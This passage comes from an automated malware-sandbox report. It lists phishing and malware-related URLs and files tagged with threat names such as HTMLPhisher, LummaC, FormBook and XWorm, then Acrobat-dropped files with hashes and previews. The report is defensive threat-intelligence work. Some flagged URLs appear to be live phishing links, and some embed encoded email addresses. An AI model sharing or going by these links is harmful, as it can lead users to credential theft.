WdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 69.49.230.198
                                                                                                    https://umanocosmetic.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVpHcG5ZM0U9JnVpZD1VU0VSMDkwMTIwMjVVNTgwMTA5NTY=N0123N%5BEMAIL%5DGet hashmaliciousUnknownBrowse
                                                                                                    • 192.185.221.152
                                                                                                    https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 69.49.230.198
                                                                                                    http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                    • 108.167.132.194
                                                                                                    http://kfz.ear.mybluehost.me/Account/netflix/login/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 50.87.184.100
                                                                                                    https://www.google.com/amp/url.rw/6r6nsGet hashmaliciousUnknownBrowse
                                                                                                    • 108.179.252.84
                                                                                                    https://docusign.legalcloudfiles.com/S06ga?e=clopez@autopistacentral.clGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 162.241.149.91
                                                                                                    http://email.bigcontacts.com/c/eJw8jsuKAyEQAL-m55ag7Ws8eMjukt8IPdqZEXQMownk75ewsMei6lApJCsXmjhIp6yRTimctqCjsPfIJDwlr3i2VntpZstGKWHuPOWAAo2QUkhljMJz1JQs6eRmHb1fImix5DW2fVAc_RxbnUrYxnh0UBfAK-A1tU7rkUt50ccDXvtGB5-3UctU36f47KPVU6JBAdwXINb3rXLvtPItJ0AEdVEaZ4fOAH4DYqT6oLzut9LW_wQQtTd-_pD7mY6Q8sI7Jx6jDdBi48I75T09-zgy_82-Av4GAAD__yLjVpkGet hashmaliciousUnknownBrowse
                                                                                                    • 192.185.170.18
                                                                                                    CLOUDFLARENETUShttps://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926eGet hashmaliciousUnknownBrowse
                                                                                                    • 1.1.1.1
                                                                                                    https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.26.12.205
                                                                                                    https://u5fv5thbb.cc.rs6.net/tn.jsp?f=001afWrpwCCI2iWUYbszOdwR1t-F0r_p2RGqIn0ncIGJMjdaOM_jQztL2YPmQvt1RwZdAfxf04J-YjkHFOHZPykwyeYjQ4jxhrp3R9ukIwbkymQTpm5mx66BC8isp_B2wncmFDUfjjBx4d0YXiDu3Nc77CSIweAs2ttJcycn-zsNnmgSBgvzRxIsANxjwCYrOKv75WAuwEQwGhM_zCMclXjGqvRsMBSOB_zxaR0ec-_RI8dWprXwmKrbaxahswkhBPJ&c=iov1_LdPHvUx2ChSLIucZWqsBXy1GpnpLdHBEmuzLivt4j5stH_55g==&ch=I1Y8e9rJ4WxwWWgomI7efPIFsqm6CDFWFpV-o6w0qPgtUQs3xBpKiA==Get hashmaliciousUnknownBrowse
                                                                                                    • 104.21.30.190
                                                                                                    MissedCall_Record_3295935663.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 104.17.25.14
                                                                                                    62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                                                    • 104.21.80.1
                                                                                                    https://xucr.vafdcekgwp.ru/aIDt6/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.18.161.117
                                                                                                    Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 1.1.1.1
                                                                                                    http://jooracces.comGet hashmaliciousUnknownBrowse
                                                                                                    • 1.1.1.1
                                                                                                    https://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9Get hashmaliciousUnknownBrowse
                                                                                                    • 172.67.201.81
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    1138de370e523e824bbca92d049a3777Payment Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 23.1.237.91
                                                                                                    https://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 23.1.237.91
                                                                                                    Subscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 23.1.237.91
                                                                                                    https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 23.1.237.91
                                                                                                    https://github.com/MscrmTools/XrmToolBox/releases/download/v1.2024.9.69/XrmToolbox.zipGet hashmaliciousUnknownBrowse
                                                                                                    • 23.1.237.91
                                                                                                    https://bccab.dynartis.it/TI_loc.csvGet hashmaliciousUnknownBrowse
                                                                                                    • 23.1.237.91
                                                                                                    1736856908fb16676aec3e4c808c4bd5cde8e123cc70360266f85ec0ed17050bca6456c9dd274.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                    • 23.1.237.91
                                                                                                    https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                    • 23.1.237.91
                                                                                                    http://bombasml.esGet hashmaliciousUnknownBrowse
                                                                                                    • 23.1.237.91
                                                                                                    https://performancemanager10.successfactors.com/sf/hrisworkflowapprovelink?workflowRequestId=V4-0-a1-iHQRWD3bQis7XhhWNKzjfWwnvURbEsN0CxUc27Zt3ml0ag&company=oceanagoldT2&username=dave.oliver@oceanagold.comGet hashmaliciousUnknownBrowse
                                                                                                    • 23.1.237.91
                                                                                                    No context
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294
                                                                                                    Entropy (8bit):5.115081286278469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:iO8QHIq2P92nKuAl9OmbnIFUtWSuCZZmwoSuCzkwO92nKuAl9OmbjLJ:7NHIv4HAahFUtYCZ/qCz5LHAaSJ
                                                                                                    MD5:D7AFEE132D202DAF1315DBF20BE9A3B7
                                                                                                    SHA1:047EE7DD392C91375347E20C84D4081F35D42852
                                                                                                    SHA-256:C0924BD13A76EBEFDA5B248EBFAE293BB750FFB0E0A2CB6466B908A9F21542A5
                                                                                                    SHA-512:F4C772D0FAB18D90D82D05E7C319EFEFA2A6B92C48BD60AA9A16069241A50CEFC9CCC34C82340BEEE90A337F87305000195C20BBCE79EE3BEECD13E2AFFF16DB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:2025/01/14-12:35:21.141 1520 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-12:35:21.143 1520 Recovering log #3.2025/01/14-12:35:21.143 1520 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294
                                                                                                    Entropy (8bit):5.115081286278469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:iO8QHIq2P92nKuAl9OmbnIFUtWSuCZZmwoSuCzkwO92nKuAl9OmbjLJ:7NHIv4HAahFUtYCZ/qCz5LHAaSJ
                                                                                                    MD5:D7AFEE132D202DAF1315DBF20BE9A3B7
                                                                                                    SHA1:047EE7DD392C91375347E20C84D4081F35D42852
                                                                                                    SHA-256:C0924BD13A76EBEFDA5B248EBFAE293BB750FFB0E0A2CB6466B908A9F21542A5
                                                                                                    SHA-512:F4C772D0FAB18D90D82D05E7C319EFEFA2A6B92C48BD60AA9A16069241A50CEFC9CCC34C82340BEEE90A337F87305000195C20BBCE79EE3BEECD13E2AFFF16DB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:2025/01/14-12:35:21.141 1520 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-12:35:21.143 1520 Recovering log #3.2025/01/14-12:35:21.143 1520 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):338
                                                                                                    Entropy (8bit):5.143051389676834
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:iO8zRzVq2P92nKuAl9Ombzo2jMGIFUtWTAgZmwozIkwO92nKuAl9Ombzo2jMmLJ:74v4HAa8uFUt8/h5LHAa8RJ
                                                                                                    MD5:5372EB40EA399F1DF57B662855071F43
                                                                                                    SHA1:4AE86A5E64D33FE1E776F16FAE84E1296CA0327F
                                                                                                    SHA-256:1B0A5D75F56D9C33F00B2A892625F4361B46D8C777436D0A3FB3D39323C5D5E2
                                                                                                    SHA-512:A5DC2AF728838A32FBEFA4161463C854E93EA80A7BD6CAF7E365054D8771189F3A9366E9230F3BC61D65D00442EF6FF3DED8E025399B006FC94D7A6B55278589
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:2025/01/14-12:35:21.240 1494 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-12:35:21.241 1494 Recovering log #3.2025/01/14-12:35:21.242 1494 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):338
                                                                                                    Entropy (8bit):5.143051389676834
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:iO8zRzVq2P92nKuAl9Ombzo2jMGIFUtWTAgZmwozIkwO92nKuAl9Ombzo2jMmLJ:74v4HAa8uFUt8/h5LHAa8RJ
                                                                                                    MD5:5372EB40EA399F1DF57B662855071F43
                                                                                                    SHA1:4AE86A5E64D33FE1E776F16FAE84E1296CA0327F
                                                                                                    SHA-256:1B0A5D75F56D9C33F00B2A892625F4361B46D8C777436D0A3FB3D39323C5D5E2
                                                                                                    SHA-512:A5DC2AF728838A32FBEFA4161463C854E93EA80A7BD6CAF7E365054D8771189F3A9366E9230F3BC61D65D00442EF6FF3DED8E025399B006FC94D7A6B55278589
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:2025/01/14-12:35:21.240 1494 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-12:35:21.241 1494 Recovering log #3.2025/01/14-12:35:21.242 1494 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):508
                                                                                                    Entropy (8bit):5.057190310260929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:YH/um3RA8sqh1MhsBdOg2Hwrcaq3QYiubxnP7E4T3OF+:Y2sRdsnydMHD3QYhbxP7nbI+
                                                                                                    MD5:38A82C1C201D6F282B7435BBA5432D52
                                                                                                    SHA1:F4F79687577C1D1C3DFB532056F36AFE57FBC8AA
                                                                                                    SHA-256:995A91B57CCBD79C059C3BA33D59BCA4C6825A2A64FB77AA21DE38E479B3D84B
                                                                                                    SHA-512:754041D440EBC0B8DBB2F7651D107885B4FE1245287CFB4840F925B0CF4DFF2DAA17E5BF387E8E714EAD4954A77208FC9545642DEE89857D40B7169B52B7CA2E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381436133708496","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":156017},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:modified
                                                                                                    Size (bytes):508
                                                                                                    Entropy (8bit):5.057190310260929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:YH/um3RA8sqh1MhsBdOg2Hwrcaq3QYiubxnP7E4T3OF+:Y2sRdsnydMHD3QYhbxP7nbI+
                                                                                                    MD5:38A82C1C201D6F282B7435BBA5432D52
                                                                                                    SHA1:F4F79687577C1D1C3DFB532056F36AFE57FBC8AA
                                                                                                    SHA-256:995A91B57CCBD79C059C3BA33D59BCA4C6825A2A64FB77AA21DE38E479B3D84B
                                                                                                    SHA-512:754041D440EBC0B8DBB2F7651D107885B4FE1245287CFB4840F925B0CF4DFF2DAA17E5BF387E8E714EAD4954A77208FC9545642DEE89857D40B7169B52B7CA2E
                                                                                                    Malicious:false
                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381436133708496","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":156017},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4509
                                                                                                    Entropy (8bit):5.2419333332528435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU9xiStd5jDZ:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLc
                                                                                                    MD5:99CFEEED83F50F230B5846F033DA84B9
                                                                                                    SHA1:0D2FE43D78753C0FFB91C54927F99C14AE520E0A
                                                                                                    SHA-256:87F503DE2DA9241BBFE7B1A8854E165894C6E5D9EA4E467AF5D2462D288A6629
                                                                                                    SHA-512:BF9987EE0F7BEE31323A8A5CA20DEEC547E7FA2CC5DE3152B1CDE437FB16259580913E667F19A506A1ACE6BD3A8027C837A6ACBF37BF3279813F6B5EE33E9D11
                                                                                                    Malicious:false
                                                                                                    Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):5.1907717131756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:iO8d0Vq2P92nKuAl9OmbzNMxIFUtWkgZmwo2URzIkwO92nKuAl9OmbzNMFLJ:7Vv4HAa8jFUtU/a25LHAa84J
                                                                                                    MD5:DB7A82E3C24D15B7DBF2D73380CCD96E
                                                                                                    SHA1:A3B7068972E40D1837D264017BC17EB615ED130A
                                                                                                    SHA-256:EBD7D0D79ED73F7413F21076AC596EB04DF7DF52A036ED591E49E70D0C17C3D8
                                                                                                    SHA-512:50D084B73A5A3C9BDEAC50427EBA303FCE53B9452B45A287CA6D25F2E1A79495EFE9B34CF2835EBD490DD58380D89F577EB4A6821601C9F0E3F85E7AB5E5EA5E
                                                                                                    Malicious:false
                                                                                                    Preview:2025/01/14-12:35:21.580 1494 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-12:35:21.582 1494 Recovering log #3.2025/01/14-12:35:21.583 1494 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):5.1907717131756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:iO8d0Vq2P92nKuAl9OmbzNMxIFUtWkgZmwo2URzIkwO92nKuAl9OmbzNMFLJ:7Vv4HAa8jFUtU/a25LHAa84J
                                                                                                    MD5:DB7A82E3C24D15B7DBF2D73380CCD96E
                                                                                                    SHA1:A3B7068972E40D1837D264017BC17EB615ED130A
                                                                                                    SHA-256:EBD7D0D79ED73F7413F21076AC596EB04DF7DF52A036ED591E49E70D0C17C3D8
                                                                                                    SHA-512:50D084B73A5A3C9BDEAC50427EBA303FCE53B9452B45A287CA6D25F2E1A79495EFE9B34CF2835EBD490DD58380D89F577EB4A6821601C9F0E3F85E7AB5E5EA5E
                                                                                                    Malicious:false
                                                                                                    Preview:2025/01/14-12:35:21.580 1494 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-12:35:21.582 1494 Recovering log #3.2025/01/14-12:35:21.583 1494 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65110
                                                                                                    Entropy (8bit):2.783890641716066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:OTMgMgMgMgMgMgMvMCMTCMBMfMWNMMEMeM2OMbtM+RMUSMEM6MgMgMgMgMgMqMqN:/dXCMSsFMDhkn0W2LuQA
                                                                                                    MD5:0AC22052158C279A125C953156CBAC25
                                                                                                    SHA1:EA9304D004634088B02C1A9DD6BA8D2886120344
                                                                                                    SHA-256:EA8C138213B0B11EE97A4EE6BEB560BF6326C2004A25D635D7321C65D2008247
                                                                                                    SHA-512:AFB75F09BABF92C9762D2D4FBD2FC027E6E0678C14C7087E25196D775A922F710E807A4168396DA1A7838D5756505094884B04CAE9247DFFA32FB28C97D6194B
                                                                                                    Malicious:false
                                                                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:Certificate, Version=3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1391
                                                                                                    Entropy (8bit):7.705940075877404
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                    Malicious:false
                                                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71954
                                                                                                    Entropy (8bit):7.996617769952133
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                    Malicious:false
                                                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):192
                                                                                                    Entropy (8bit):2.7686775296558497
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:kkFkl/I6DbNvfllXlE/HT8ketNNX8RolJuRdxLlGB9lQRYwpDdt:kK/RT8RTNMa8RdWBwRd
                                                                                                    MD5:95A6CE21D2E599B6F3B9341305682414
                                                                                                    SHA1:025B62162CFB77CD2B15040CD92D4DEFA5EEAEA7
                                                                                                    SHA-256:9B6CF96075FD6450F719514E60A61CFE1C887F4AA783C10B3DDA2044A920DFFD
                                                                                                    SHA-512:44B712BE049FE1453CB934994930C3E9D6BE67CF5F3BF036F625F4A9E78A08E3DF91D165B3494144D144D0E0278693CBBBCCC6BFD62A358EAC852AAC3F0C83EB
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .........m...f..(....................................................... ..........W....-?..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):328
                                                                                                    Entropy (8bit):3.144086598890895
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKA6kT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:AqDnLNkPlE99SNxAhUe/3
                                                                                                    MD5:4E55A8BF23CDC136594202468FB3AA40
                                                                                                    SHA1:1D17BBBE1CA4D8FDEB6BF4A7251EC68D6C072010
                                                                                                    SHA-256:98CF25045A2BBD4973697159F474BC6D608AC29A5BB96FAFB34B9A2CEC5B94FD
                                                                                                    SHA-512:49118EAFA95D5E66B9314EFAF74AB2D109F96547F4C81C87E2C663567E439CF8290A4704F422EF2D48011EE99B2473B31AA3224E6BE33C8AC9A04D692806E8C1
                                                                                                    Malicious:false
                                                                                                    Preview:p...... ............f..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):227002
                                                                                                    Entropy (8bit):3.392780893644728
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
                                                                                                    MD5:87EDBEE38F56C20298F25D5D3D4D1B5C
                                                                                                    SHA1:7F904E9615AC3186A87472EF366DD8202855B0B7
                                                                                                    SHA-256:A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
                                                                                                    SHA-512:BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
                                                                                                    Malicious:false
                                                                                                    Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
